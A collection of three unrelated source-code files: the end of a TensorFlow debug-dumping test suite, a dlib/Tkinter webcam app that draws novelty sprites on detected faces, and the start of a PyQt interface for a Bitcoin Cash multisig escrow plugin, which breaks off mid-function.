next(execution_iter)
@parameterized.named_parameters(
("NoTensor", "NO_TENSOR"),
("CurtHealth", "CURT_HEALTH"),
("FullTensor", "FULL_TENSOR"),
)
def testMultiThreadedExecutionWithSameSetting(self, tensor_debug_mode):
"""Dumping from multiple threads using the same setting."""
writer = dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode=tensor_debug_mode)
x = variables.Variable(10.0, dtype=dtypes.float32)
y = variables.Variable(3.0, dtype=dtypes.float32)
@def_function.function
def increase_x():
return x.assign_add(y * 2.0)
increase_x()
num_threads = 3
threads = []
for _ in range(num_threads):
threads.append(threading.Thread(target=increase_x))
for thread in threads:
thread.start()
for thread in threads:
thread.join()
# 10 --> 16 --> 22 --> 28 --> 34.
self.assertAllClose(x.read_value(), 34.0)
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
stack_frame_by_id = self._readAndCheckSourceFilesAndStackFrames()
with debug_events_reader.DebugEventsReader(self.dump_root) as reader:
execution_iter = reader.execution_iterator()
prev_wall_time = 1
for debug_event in execution_iter:
self.assertGreaterEqual(debug_event.wall_time, prev_wall_time)
prev_wall_time = debug_event.wall_time
(context_ids, _,
op_name_to_op_type, _) = self._readAndCheckGraphsFile(stack_frame_by_id)
(op_names, _, output_slots,
tensor_values) = self._readAndCheckGraphExecutionTracesFile(context_ids)
executed_op_types = [op_name_to_op_type[op_name] for op_name in op_names]
self.assertEqual(executed_op_types.count("Mul"), 1 + num_threads)
self.assertEqual(
executed_op_types.count("ReadVariableOp"), 2 * (1 + num_threads))
for output_slot in output_slots:
self.assertEqual(output_slot, 0)
if tensor_debug_mode == "NO_TENSOR":
for tensor_value in tensor_values:
self.assertEqual(tensor_value.dtype, np.float32)
self.assertEqual(tensor_value.shape, (0,))
elif tensor_debug_mode == "CURT_HEALTH":
for tensor_value in tensor_values:
self.assertLen(tensor_value, 2)
# 1st element: tensor_id, should be >= 0.
# TODO(cais): Assert on detailed value once Function-graph association
# is in place.
self.assertGreaterEqual(tensor_value[0], 0)
# 2nd element: 0 means there is no inf or nan.
self.assertEqual(tensor_value[1], 0)
elif tensor_debug_mode == "FULL_TENSOR":
mul_values = [
tensor_values[i]
for i, op_type in enumerate(executed_op_types)
if op_type == "Mul"
]
self.assertAllClose(mul_values, [6.0, 6.0, 6.0, 6.0])
def testMultiThreadedDumpingWithDifferentSettings(self):
dump_root_1 = os.path.join(self.dump_root, "dump_root_1")
dump_root_2 = os.path.join(self.dump_root, "dump_root_2")
v1 = variables.Variable(10.0, dtype=dtypes.float32)
v2 = variables.Variable(3.0, dtype=dtypes.float32)
def add_negative_v1_squared_to_itself():
writer = dumping_callback.enable_dump_debug_info(
dump_root_1, tensor_debug_mode="FULL_TENSOR")
# Run in a loop to facilitate interleaving between threads.
for _ in range(3):
v1.assign_add(-(v1 ** 2.0))
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
def add_negative_v2_squared_to_itself():
writer = dumping_callback.enable_dump_debug_info(
dump_root_2, tensor_debug_mode="FULL_TENSOR")
v2_squared = v2 ** 2.0
# Since dumping is disabled before the Neg op is called, no tensor data
# should be dumped from the op, but this shouldn't affect the dumping of
# the tensor data from the Neg op in `add_negative_v1_squared_to_itself`.
# Both behavior is checked below.
dumping_callback.disable_dump_debug_info()
negative_v2_squared = -v2_squared
v2.assign_add(negative_v2_squared)
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
# v2 is mutated on a sub-thread.
sub_thread = threading.Thread(target=add_negative_v2_squared_to_itself)
sub_thread.start()
add_negative_v1_squared_to_itself() # v1 is mutated on the main thread.
sub_thread.join()
# 10 - 10 * 10 = -90.
# -90 - (-90 * -90) = -8190.
# -8190 - (-8190 * -8190) = -67084290.
self.assertAllClose(v1.read_value(), -67084290.0)
self.assertAllClose(v2.read_value(), -6.0)
(executed_op_types, _, _, _, _,
tensor_values) = self._readAndCheckExecutionFile(dump_root=dump_root_1)
v1_squared_values = [
tensor_values[i] for i, op_type in enumerate(executed_op_types)
if op_type == "Pow"]
negative_v1_squared_values = [
tensor_values[i] for i, op_type in enumerate(executed_op_types)
if op_type == "Neg"]
self.assertAllClose(v1_squared_values, [[100.0], [8100.0], [67076100.0]])
self.assertAllClose(
negative_v1_squared_values, [[-100.0], [-8100.0], [-67076100.0]])
(executed_op_types, _, _, _, _,
tensor_values) = self._readAndCheckExecutionFile(dump_root=dump_root_2)
self.assertNotIn("Neg", executed_op_types)
v2_squared_values = tensor_values[executed_op_types.index("Pow")]
self.assertAllClose(v2_squared_values, [9.0])
@test_util.run_in_graph_and_eager_modes
def testNestedContextIsCapturedByGraphOpCreationHistory(self):
writer = dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode="NO_TENSOR")
@def_function.function
def iterative_doubling(x, times):
i = constant_op.constant(0, dtype=dtypes.int32)
while i < times:
x = x * 2.0 - 1.0
i += 1
return x
x = constant_op.constant(2.0, dtype=dtypes.float32)
times = constant_op.constant(4, dtype=dtypes.int32)
# 2 * 2 - 1 = 3; 3 * 2 - 1 = 5; 5 * 2 - 1 = 9; 9 * 2 - 1 = 17.
self.assertAllClose(self.evaluate(iterative_doubling(x, times)), 17.0)
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
stack_frame_by_id = self._readAndCheckSourceFilesAndStackFrames()
(_, _, op_name_to_op_type,
op_name_to_context_id) = self._readAndCheckGraphsFile(stack_frame_by_id)
less_op_names = [op_name for op_name in op_name_to_op_type
if op_name_to_op_type[op_name] == "Less"]
less_context_ids = [op_name_to_context_id[op_name]
for op_name in less_op_names]
mul_op_names = [op_name for op_name in op_name_to_op_type
if op_name_to_op_type[op_name] == "Mul"]
mul_context_ids = [op_name_to_context_id[op_name]
for op_name in mul_op_names]
sub_op_names = [op_name for op_name in op_name_to_op_type
if op_name_to_op_type[op_name] == "Sub"]
sub_context_ids = [op_name_to_context_id[op_name]
for op_name in sub_op_names]
self.assertLen(less_context_ids, 1)
self.assertLen(mul_context_ids, 1)
self.assertLen(sub_context_ids, 1)
self.assertTrue(less_context_ids[0])
self.assertTrue(mul_context_ids[0])
self.assertTrue(sub_context_ids[0])
# The Less op is from the while-loop cond context and hence should have
# a different innermost context ID from the mul and sub ops, which are both
# from the while-loop body context.
self.assertNotEqual(less_context_ids[0], mul_context_ids[0])
self.assertNotEqual(less_context_ids[0], sub_context_ids[0])
# The Mul and Sub ops are from the same innermost context.
self.assertEqual(mul_context_ids[0], sub_context_ids[0])
@parameterized.named_parameters(
("NoTensor", "NO_TENSOR"),
("FullTensor", "FULL_TENSOR"),
)
@test_util.run_in_graph_and_eager_modes
def testSimpleKerasRecurrentModelPredict(self, tensor_debug_mode):
writer = dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode=tensor_debug_mode)
model = _create_simple_recurrent_keras_model([3, 4])
batch_size = 5
xs = np.ones([batch_size, 3, 4])
self.assertAllClose(model.predict(xs), np.zeros([batch_size, 1]))
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
stack_frame_by_id = self._readAndCheckSourceFilesAndStackFrames()
(context_ids, op_types,
op_name_to_op_type, _) = self._readAndCheckGraphsFile(stack_frame_by_id)
# Simply assert that graph are recorded and refrain from asserting on the
# internal details of the Keras model.
self.assertTrue(context_ids)
self.assertTrue(op_types)
self.assertTrue(op_name_to_op_type)
if context.executing_eagerly():
# NOTE(b/142486213): Execution of the TF function happens with
# Session.run() in v1 graph mode, hence it doesn't get logged to the
# .execution file.
(executed_op_types, _, _, _, _,
tensor_values) = self._readAndCheckExecutionFile()
self.assertTrue(executed_op_types)
for value_list in tensor_values:
if tensor_debug_mode == "NO_TENSOR":
self.assertFalse(value_list)
(op_names, _, _,
tensor_values) = self._readAndCheckGraphExecutionTracesFile(context_ids)
executed_op_types = [op_name_to_op_type[op_name] for op_name in op_names]
# These are the ops that we can safely assume to have been executed during
# the model prediction.
self.assertIn("MatMul", executed_op_types)
self.assertIn("BiasAdd", executed_op_types)
# On the GPU, CudnnRNN is used in lieu of the default op-by-op
# implementation.
self.assertTrue(
("Sigmoid" in executed_op_types and "Tanh" in executed_op_types or
"CudnnRNN" in executed_op_types))
# Under the default NO_TENSOR tensor-debug mode, the tensor_proto ought to
# be an empty float32 tensor.
if tensor_debug_mode == "NO_TENSOR":
for tensor_value in tensor_values:
self.assertEqual(tensor_value.dtype, np.float32)
self.assertEqual(tensor_value.shape, (0,))
else:
# Refrain from asserting the internal implementation details of the LSTM
# layer.
concrete_tensor_values = [
value for value in tensor_values
if value is not None and value.size > 0
]
self.assertTrue(concrete_tensor_values)
@parameterized.named_parameters(
("NoTensor", "NO_TENSOR"),
("FullTensor", "FULL_TENSOR"),
)
@test_util.run_in_graph_and_eager_modes
def testSimpleKerasRecurrentModelFit(self, tensor_debug_mode):
writer = dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode=tensor_debug_mode)
model = _create_simple_recurrent_keras_model([3, 4])
xs = np.ones([5, 3, 4])
ys = np.ones([5, 1])
history = model.fit(xs, ys, epochs=3, verbose=0)
self.assertAllClose(
history.history["loss"], [1.0, 0.9603999853134155, 0.9223681688308716])
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
stack_frame_by_id = self._readAndCheckSourceFilesAndStackFrames()
(context_ids, op_types,
op_name_to_op_type, _) = self._readAndCheckGraphsFile(stack_frame_by_id)
# Simply assert that graph are recorded and refrain from asserting on the
# internal details of the Keras model.
self.assertTrue(context_ids)
self.assertTrue(op_types)
self.assertTrue(op_name_to_op_type)
if context.executing_eagerly():
# NOTE(b/142486213): Execution of the TF function happens with
# Session.run() in v1 graph mode, hence it doesn't get logged to the
# .execution file.
(executed_op_types, _, _, _, _,
tensor_values) = self._readAndCheckExecutionFile()
self.assertTrue(executed_op_types)
if tensor_debug_mode == "NO_TENSOR":
for value_list in tensor_values:
self.assertFalse(value_list)
(op_names, _, _,
tensor_values) = self._readAndCheckGraphExecutionTracesFile(context_ids)
executed_op_types = [op_name_to_op_type[op_name] for op_name in op_names]
# These are the ops that we can safely assume to have been executed during
# the recurrent model's fit() call.
self.assertIn("MatMul", executed_op_types)
self.assertIn("BiasAdd", executed_op_types)
# On the GPU, CudnnRNN is used in lieu of the default op-by-op
# implementation.
self.assertTrue(
("Sigmoid" in executed_op_types and "Tanh" in executed_op_types or
"CudnnRNN" in executed_op_types))
self.assertTrue(
("SigmoidGrad" in executed_op_types and
"TanhGrad" in executed_op_types or
"CudnnRNNBackprop" in executed_op_types))
if tensor_debug_mode == "NO_TENSOR":
# Under the default NO_TENSOR tensor-debug mode, the tensor_proto ought
# to be an empty float32 tensor.
for tensor_value in tensor_values:
self.assertEqual(tensor_value.dtype, np.float32)
self.assertEqual(tensor_value.shape, (0,))
@parameterized.named_parameters(
("NoTensor", "NO_TENSOR"),
("FullTensor", "FULL_TENSOR"),
)
@test_util.run_in_graph_and_eager_modes
def testMobiletNetV2Fit(self, tensor_debug_mode):
"""Test training Keras MobileNetV2 works with dumping."""
# Use a large circular-buffer to make sure we capture all the executed ops.
writer = dumping_callback.enable_dump_debug_info(
self.dump_root,
tensor_debug_mode=tensor_debug_mode,
circular_buffer_size=100000)
model = mobilenet_v2.MobileNetV2(
input_shape=(32, 32, 3), alpha=0.1, weights=None)
y = model.layers[22].output
y = core.Flatten()(y)
y = core.Dense(1)(y)
model = models.Model(inputs=model.inputs, outputs=y)
batch_size = 2
xs = np.zeros([batch_size] + list(model.input_shape[1:]))
ys = np.zeros([batch_size] + list(model.output_shape[1:]))
model.compile(optimizer="sgd", loss="mse")
epochs = 1
history = model.fit(xs, ys, epochs=epochs, verbose=0)
self.assertLen(history.history["loss"], epochs)
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
stack_frame_by_id = self._readAndCheckSourceFilesAndStackFrames()
(context_ids, op_types,
op_name_to_op_type, _) = self._readAndCheckGraphsFile(stack_frame_by_id)
# Simply assert that graph are recorded and refrain from asserting on the
# internal details of the Keras model.
self.assertTrue(context_ids)
self.assertTrue(op_types)
self.assertTrue(op_name_to_op_type)
if context.executing_eagerly():
# NOTE(b/142486213): Execution of the TF function happens with
# Session.run() in v1 graph mode, hence it doesn't get logged to the
# .execution file.
executed_op_types, _, _, _, _, _ = self._readAndCheckExecutionFile()
self.assertTrue(executed_op_types)
(op_names, _, _,
tensor_values) = self._readAndCheckGraphExecutionTracesFile(context_ids)
executed_op_types = [op_name_to_op_type[op_name] for op_name in op_names]
# These are the ops that we can safely assume to have been executed during
# the model's fit() call.
self.assertIn("Conv2D", executed_op_types)
self.assertIn("Relu6", executed_op_types)
self.assertIn("Conv2DBackpropFilter", executed_op_types)
self.assertIn("Relu6Grad", executed_op_types)
if tensor_debug_mode == "NO_TENSOR":
# Under the default NO_TENSOR tensor-debug mode, the tensor_proto ought to
# be an empty float32 tensor.
for tensor_value in tensor_values:
self.assertEqual(tensor_value.dtype, np.float32)
self.assertEqual(tensor_value.shape, (0,))
elif tensor_debug_mode == "FULL_TENSOR":
conv2d_values = [
tensor_values[i]
for i, op_type in enumerate(executed_op_types)
if op_type == "Conv2D"
]
self.assertTrue(conv2d_values)
for conv2d_value in conv2d_values:
self.assertGreater(len(conv2d_value.shape), 1)
self.assertEqual(conv2d_value.shape[0], batch_size)
relu6_values = [
tensor_values[i]
for i, op_type in enumerate(executed_op_types)
if op_type == "Relu6"
]
self.assertTrue(relu6_values)
for relu6_value in relu6_values:
self.assertGreater(len(relu6_value.shape), 1)
self.assertEqual(relu6_value.shape[0], batch_size)
conv2d_bp_filter_values = [
tensor_values[i]
for i, op_type in enumerate(executed_op_types)
if op_type == "Conv2DBackpropFilter"
]
self.assertTrue(conv2d_bp_filter_values)
for conv2d_bp_filter_value in conv2d_bp_filter_values:
self.assertGreater(len(conv2d_bp_filter_value.shape), 1)
relu6_grad_values = [
tensor_values[i]
for i, op_type in enumerate(executed_op_types)
if op_type == "Relu6Grad"
]
self.assertTrue(relu6_grad_values)
for relu6_grad_value in relu6_grad_values:
self.assertGreater(len(relu6_grad_value.shape), 1)
if __name__ == "__main__":
ops.enable_eager_execution()
googletest.main()
|
main_dlib.py
|
# Requirements:
# pip install tk
# pip install pillow
from Tkinter import *
from PIL import Image
from PIL import ImageTk
import cv2, threading, os, time
from threading import Thread
from os import listdir
from os.path import isfile, join
import dlib
from imutils import face_utils, rotate_bound
import math
### Function to set wich sprite must be drawn
def put_sprite(num):
global SPRITES, BTNS
SPRITES[num] = (1 - SPRITES[num]) #not actual value
if SPRITES[num]:
BTNS[num].config(relief=SUNKEN)
else:
BTNS[num].config(relief=RAISED)
# Draws sprite over a image
# It uses the alpha chanel to see which pixels need to be reeplaced
# Input: image, sprite: numpy arrays
# output: resulting merged image
def draw_sprite(frame, sprite, x_offset, y_offset):
(h,w) = (sprite.shape[0], sprite.shape[1])
(imgH,imgW) = (frame.shape[0], frame.shape[1])
if y_offset+h >= imgH: #if sprite gets out of image in the bottom
sprite = sprite[0:imgH-y_offset,:,:]
if x_offset+w >= imgW: #if sprite gets out of image to the right
sprite = sprite[:,0:imgW-x_offset,:]
if x_offset < 0: #if sprite gets out of image to the left
sprite = sprite[:,abs(x_offset)::,:]
w = sprite.shape[1]
x_offset = 0
#for each RGB chanel
for c in range(3):
#chanel 4 is alpha: 255 is not transpartne, 0 is transparent background
frame[y_offset:y_offset+h, x_offset:x_offset+w, c] = \
sprite[:,:,c] * (sprite[:,:,3]/255.0) + frame[y_offset:y_offset+h, x_offset:x_offset+w, c] * (1.0 - sprite[:,:,3]/255.0)
return frame
#Adjust the given sprite to the head's width and position
#in case of the sprite not fitting the screen in the top, the sprite should be trimed
def adjust_sprite2head(sprite, head_width, head_ypos, ontop = True):
(h_sprite,w_sprite) = (sprite.shape[0], sprite.shape[1])
factor = 1.0*head_width/w_sprite
sprite = cv2.resize(sprite, (0,0), fx=factor, fy=factor) # adjust to have the same width as head
(h_sprite,w_sprite) = (sprite.shape[0], sprite.shape[1])
y_orig = head_ypos-h_sprite if ontop else head_ypos # adjust the position of sprite to end where the head begins
if (y_orig < 0): #check if the head is not to close to the top of the image and the sprite would not fit in the screen
sprite = sprite[abs(y_orig)::,:,:] #in that case, we cut the sprite
y_orig = 0 #the sprite then begins at the top of the image
return (sprite, y_orig)
# Applies sprite to image detected face's coordinates and adjust it to head
def apply_sprite(image, path2sprite,w,x,y, angle, ontop = True):
sprite = cv2.imread(path2sprite,-1)
#print sprite.shape
sprite = rotate_bound(sprite, angle)
(sprite, y_final) = adjust_sprite2head(sprite, w, y, ontop)
image = draw_sprite(image,sprite,x, y_final)
#points are tuples in the form (x,y)
# returns angle between points in degrees
def calculate_inclination(point1, point2):
x1,x2,y1,y2 = point1[0], point2[0], point1[1], point2[1]
incl = 180/math.pi*math.atan((float(y2-y1))/(x2-x1))
return incl
def calculate_boundbox(list_coordinates):
x = min(list_coordinates[:,0])
y = min(list_coordinates[:,1])
w = max(list_coordinates[:,0]) - x
h = max(list_coordinates[:,1]) - y
return (x,y,w,h)
def get_face_boundbox(points, face_part):
if face_part == 1:
(x,y,w,h) = calculate_boundbox(points[17:22]) #left eyebrow
elif face_part == 2:
(x,y,w,h) = calculate_boundbox(points[22:27]) #right eyebrow
elif face_part == 3:
(x,y,w,h) = calculate_boundbox(points[36:42]) #left eye
elif face_part == 4:
(x,y,w,h) = calculate_boundbox(points[42:48]) #right eye
elif face_part == 5:
(x,y,w,h) = calculate_boundbox(points[29:36]) #nose
elif face_part == 6:
(x,y,w,h) = calculate_boundbox(points[48:68]) #mouth
return (x,y,w,h)
#Principal Loop where openCV (magic) ocurs
def cvloop(run_event):
global panelA
global SPRITES
dir_ = "./sprites/flyes/"
flies = [f for f in listdir(dir_) if isfile(join(dir_, f))] #image of flies to make the "animation"
i = 0
video_capture = cv2.VideoCapture(0) #read from webcam
(x,y,w,h) = (0,0,10,10) #whatever initial values
#Filters path
detector = dlib.get_frontal_face_detector()
#Facial landmarks
print("[INFO] loading facial landmark predictor...")
model = "filters/shape_predictor_68_face_landmarks.dat"
predictor = dlib.shape_predictor(model) # link to model: http://dlib.net/files/shape_predictor_68_face_landmarks.dat.bz2
while run_event.is_set(): #while the thread is active we loop
ret, image = video_capture.read()
gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
faces = detector(gray, 0)
for face in faces: #if there are faces
(x,y,w,h) = (face.left(), face.top(), face.width(), face.height())
# *** Facial Landmarks detection
shape = predictor(gray, face)
shape = face_utils.shape_to_np(shape)
incl = calculate_inclination(shape[17], shape[26]) #inclination based on eyebrows
# condition to see if mouth is open
is_mouth_open = (shape[66][1] -shape[62][1]) >= 10 #y coordiantes of landmark points of lips
#hat condition
if SPRITES[0]:
apply_sprite(image, "./sprites/hat.png",w,x,y, incl)
#mustache condition
if SPRITES[1]:
(x1,y1,w1,h1) = get_face_boundbox(shape, 6)
apply_sprite(image, "./sprites/mustache.png",w1,x1,y1, incl)
#glasses condition
if SPRITES[3]:
(x3,y3,_,h3) = get_face_boundbox(shape, 1)
apply_sprite(image, "./sprites/glasses.png",w,x,y3, incl, ontop = False)
#flies condition
if SPRITES[2]:
#to make the "animation" we read each time a different image of that folder
# the images are placed in the correct order to give the animation impresion
apply_sprite(image, dir_+flies[i],w,x,y, incl)
i+=1
i = 0 if i >= len(flies) else i #when done with all images of that folder, begin again
#doggy condition
(x0,y0,w0,h0) = get_face_boundbox(shape, 6) #bound box of mouth
if SPRITES[4]:
(x3,y3,w3,h3) = get_face_boundbox(shape, 5) #nose
apply_sprite(image, "./sprites/doggy_nose.png",w3,x3,y3, incl, ontop = False)
apply_sprite(image, "./sprites/doggy_ears.png",w,x,y, incl)
if is_mouth_open:
apply_sprite(image, "./sprites/doggy_tongue.png",w0,x0,y0, incl, ontop = False)
else:
if is_mouth_open:
apply_sprite(image, "./sprites/rainbow.png",w0,x0,y0, incl, ontop = False)
# OpenCV represents image as BGR; PIL but RGB, we need to change the chanel order
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
# conerts to PIL format
image = Image.fromarray(image)
# Converts to a TK format to visualize it in the GUI
image = ImageTk.PhotoImage(image)
# Actualize the image in the panel to show it
panelA.configure(image=image)
panelA.image = image
video_capture.release()
# Initialize GUI object
root = Tk()
root.title("Snap chat filters")
this_dir = os.path.dirname(os.path.realpath(__file__))
# Adds a custom logo
imgicon = PhotoImage(file=os.path.join(this_dir,'imgs\icon.gif'))
root.tk.call('wm', 'iconphoto', root._w, imgicon)
##Create 5 buttons and assign their corresponding function to active sprites
btn1 = Button(root, text="Hat", command = lambda: put_sprite(0))
btn1.pack(side="top", fill="both", expand="no", padx="5", pady="5")
btn2 = Button(root, text="Mustache", command = lambda: put_sprite(1))
btn2.pack(side="top", fill="both", expand="no", padx="5", pady="5")
btn3 = Button(root, text="Flies", command = lambda: put_sprite(2))
btn3.pack(side="top", fill="both", expand="no", padx="5", pady="5")
btn4 = Button(root, text="Glasses", command = lambda: put_sprite(3) )
btn4.pack(side="top", fill="both", expand="no", padx="5", pady="5")
btn5 = Button(root, text="Doggy", command = lambda: put_sprite(4) )
btn5.pack(side="top", fill="both", expand="no", padx="5", pady="5")
# Create the panel where webcam image will be shown
panelA = Label(root)
panelA.pack( padx=10, pady=10)
# Variable to control which sprite you want to visualize
SPRITES = [0,0,0,0,0] #hat, mustache, flies, glasses, doggy -> 1 is visible, 0 is not visible
BTNS = [btn1, btn2, btn3, btn4, btn5]
# Creates a thread where the magic ocurs
run_event = threading.Event()
run_event.set()
action = Thread(target=cvloop, args=(run_event,))
action.setDaemon(True)
action.start()
# Function to close all properly, aka threads and GUI
def terminate():
global root, run_event, action
print "Closing thread opencv..."
run_event.clear()
time.sleep(1)
#action.join() #strangely in Linux this thread does not terminate properly, so .join never finishes
root.destroy()
print "All closed! Chao"
# When the GUI is closed it actives the terminate function
root.protocol("WM_DELETE_WINDOW", terminate)
root.mainloop() #creates loop of GUI
|
qt3.py
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
import os
import sys, threading, time
#from PyQt5.QtCore import pyqtSlot
#from PyQt5.QtWidgets import *
#from PyQt5.QtGui import QFont, QIcon
# electron cash modules
'''
script_dir = os.path.dirname(os.path.realpath(__file__))
sys.path.insert(0, os.path.join(script_dir, 'packages'))
import imp
imp.load_module('electroncash', *imp.find_module('lib'))
imp.load_module('electroncash_gui', *imp.find_module('gui'))
imp.load_module('electroncash_plugins', *imp.find_module('plugins'))
'''
from PyQt5.QtGui import *
from PyQt5.QtCore import *
from PyQt5.QtWidgets import *
from electroncash.i18n import _
from electroncash import Network
from electroncash.bitcoin import COIN
from electroncash.address import Address, AddressError
from electroncash.plugins import BasePlugin, hook
from electroncash_gui.qt.util import EnterButton, Buttons, CloseButton, MessageBoxMixin, Buttons, MyTreeWidget, TaskThread
from electroncash_gui.qt.util import OkButton, WindowModalDialog
from electroncash.util import user_dir
import electroncash.version, os
from cashrip import CashRip
#sys.stderr = open('/dev/null', 'w')
class cashripQT(QWidget):
def __init__(self, parent):
super().__init__()
#self.window = window
self.parent = parent
self.config = None
self.cashRip = self.parent.cashRip
self.title = 'CashRipQT'
self.initUI()
# qt.py and qt3.py are identical starting from this line until almost end of file, except for if __name__.
def initUI(self):
QToolTip.setFont(QFont('SansSerif', 10))
#self.setToolTip('This is a <b>QWidget</b> widget')
self.buttons = QHBoxLayout()
btn1 = QPushButton('1: Create Contract\n(buyer)', self)
btn1.setToolTip('Creates a new contract.')
btn1.resize(btn1.sizeHint())
btn1.clicked.connect(self.invite)
self.buttons.addWidget(btn1)
#btn.move(50, 50)
btn2 = QPushButton('2: Accept Invite\n(merchant)', self)
btn2.setToolTip('Input: partner\'s <b>x_pubkey</b>.')
btn2.resize(btn2.sizeHint())
btn2.clicked.connect(self.accInvite)
self.buttons.addWidget(btn2)
btn3 = QPushButton('3: Check Address\n(buyer)', self)
btn3.setToolTip('Input: your partner\'s generated multisig <b>address</b> and <b>x_pubkey</b>. Also select the <b>contract</b> you used to invite your partner.')
btn3.resize(btn3.sizeHint())
btn3.clicked.connect(self.checkAddress)
self.buttons.addWidget(btn3)
btn4 = QPushButton('4: Request Release', self)
btn4.setToolTip('Input: BCH <b>address</b> to which the funds will be released. Also select your <b>contract</b> that contains the funds to be released.')
btn4.resize(btn4.sizeHint())
btn4.clicked.connect(self.requestRelease)
self.buttons.addWidget(btn4)
btn5 = QPushButton('5: Release', self)
btn5.setToolTip('Input: <b>hex code</b> sent by your partner. Also select your <b>contract</b> that contains the funds to be released.')
btn5.resize(btn5.sizeHint())
btn5.clicked.connect(self.release)
self.buttons.addWidget(btn5)
btn6 = QPushButton('Delete Contract', self)
btn6.setToolTip('Delete selected <b>contract</b>. You cannot delete any contract that still contains funds as you will then be unable to release those funds in the future.')
btn6.resize(btn6.sizeHint())
btn6.clicked.connect(self.delContract)
self.buttons.addWidget(btn6)
self.table = cashRipList(self)
self.table.setSelectionBehavior(QAbstractItemView.SelectRows)
#self.table.itemClicked.connect(self.table_click)
#self.table.setColumnCount(4)
#self.table.setHorizontalHeaderLabels(("Address;Confirmed;Unconfirmed;x_pubkey").split(";"))
#self.table.setColumnWidth(3,230)
#self.table.horizontalHeaderItem().setTextAlignment(Qt.AlignHCenter)
self.table.update()
#listWidget.currentItemChanged.connect(self.item_click)
self.textArea1 = QLabel('Please select the contract you wish to use below.')
#self.textArea2 = QLabel('Contract information (x_pubkey or transaction hex) goes in the box below.')
self.textArea2 = QLabel('')
self.textArea2.setTextInteractionFlags(Qt.TextSelectableByMouse | Qt.TextSelectableByKeyboard)
self.textArea2.setStyleSheet("color: rgb(0, 0, 0);")
self.textArea2.setSizePolicy(QSizePolicy.Ignored, QSizePolicy.Fixed)
#self.textArea.setText('Please select the contract you wish to use above.\nContract information (x_pubkey or transaction hex) goes in the box below.')
#self.textBox = QPlainTextEdit(self)
#self.textBox.setPlainText('')
'''
self.addressBoxArea = QHBoxLayout()
self.addressBox = QLineEdit(self)
self.addrLabel = QLabel("Address:")
self.addressBoxArea.addWidget(self.addrLabel)
self.addressBoxArea.addWidget(self.addressBox)
'''
# Add box layout, add table to box layout and add box layout to widget
self.layout = QVBoxLayout()
self.layout.addWidget(self.textArea1)
self.layout.addWidget(self.table)
#layout.addStretch(1)
self.layout.addWidget(self.textArea2)
#self.layout.addWidget(self.textBox)
#self.layout.addLayout(self.addressBoxArea)
self.layout.addLayout(self.buttons)
self.setLayout(self.layout)
#self.layout.move(100,100)
#self.listWidget.show()
self.setWindowTitle('Cash Rip')
#self.setGeometry(self.left, self.top, self.width, self.height)
self.resize(self.sizeHint())
self.center()
self.show()
def center(self):
qr = self.frameGeometry()
cp = QDesktopWidget().availableGeometry().center()
qr.moveCenter(cp)
self.move(qr.topLeft())
def table_click(self, item):
pass
#print(item.text())
#print(self.currentRow())
#print(self.table.currentRow())
def getCurrentContract(self):
item = self.table.currentItem()
if item:
return int(item.text(0))
else:
self.textArea2.setStyleSheet("color: rgb(255, 0, 0);")
self.textArea2.setText("Please select a contract above, or create a new one via Create or Accept.")
return None
#@pyqtSlot()
#def run_update(self):
# self.table.update()
def clearTextArea(self):
#self.textArea2.setStyleSheet("color: rgb(0, 0, 0);")
self.textArea2.setStyleSheet("")
self.textArea2.setText("")
def invite(self):
self.clearTextArea()
buttonReply = QMessageBox.question(self, 'PyQt5 message', "This will create a new contract", QMessageBox.Yes | QMessageBox.No, QMessageBox.No)
if buttonReply == QMessageBox.Yes:
self.textArea2.setText("Please wait . . .")
self.textArea2.repaint()
wallet, contract = self.cashRip.genContractWallet()
contract["label"] = "buyer"
self.cashRip.updateContracts()
self.parent.update()
self.textArea2.setText("Give this x_pubkey to the other party:\n{}".format(contract['my_x_pubkey']))
else:
return
def accInvite(self):
self.clearTextArea()
text, ok = QInputDialog.getText(self, "Accept Invite","Your partner's x_pubkey:", QLineEdit.Normal, "")
if ok:
xpub = text
#xpub = self.textBox.document().toPlainText()
if xpub[:2] != "ff" or len(xpub) < 100:
#self.textBox.setStyleSheet("background-color: rgb(255, 0, 0);")
self.textArea2.setStyleSheet("color: rgb(255, 0, 0);")
self.textArea2.setText("The x_pubkey that you entered is invalid.")
return
self.textArea2.setText("Please wait . . .")
self.textArea2.repaint()
wallet, contract = self.cashRip.genContractWallet()
contract["label"] = "merchant"
self.cashRip.updateContracts()
idx = len(self.cashRip.contracts)-1
try:
contract = self.cashRip.create_multisig_addr(idx, xpub)
except:
self.textArea2.setStyleSheet("color: rgb(255, 0, 0);")
self.textArea2.setText("Something was wrong with the x_pubkey you entered.")
self.cashRip.delContract(idx)
self.parent.update()
return
self.textArea2.setText("Your multisig address: {}\nYour x_pubkey: {}\nPlease share your x_pubkey and multisig address with your partner.".format(contract["address"], contract["my_x_pubkey"]))
self.parent.update()
#if self.textArea2.text()[:4] == "Your":
self.cashRip.startSyncMultiWallet(idx)
def checkAddress(self):
self.clearTextArea()
currentContract = self.getCurrentContract()
if currentContract == None:
return
if "address" in self.cashRip.contracts[currentContract]:
self.textArea2.setStyleSheet("color: rgb(255, 0, 0);")
self.textArea2.setText("This contract already has an address. Maybe you selected the wrong contract?")
return
#text, ok = QInputDialog.getText(self, "Check Address","Your partner's x_pubkey:", QLineEdit.Normal, "")
dialog = CheckAddressDialog(self)
dialog.currentContract = currentContract
dialog.show()
#dialog.exec_()
self.dialog = dialog
#if dialog.exec_():
def checkAddressAcc(self, dialog):
#if a == QDialog.acccepted:
#addrOrig = self.addressBox.text()
addrOrig = dialog.address.text()
try:
addr = Address.from_string(addrOrig)
except AddressError as e:
self.textArea2.setStyleSheet("color: rgb(255, 0, 0);")
self.textArea2.setText("The multisig address you entered is invalid.")
return
if addr.kind != Address.ADDR_P2SH:
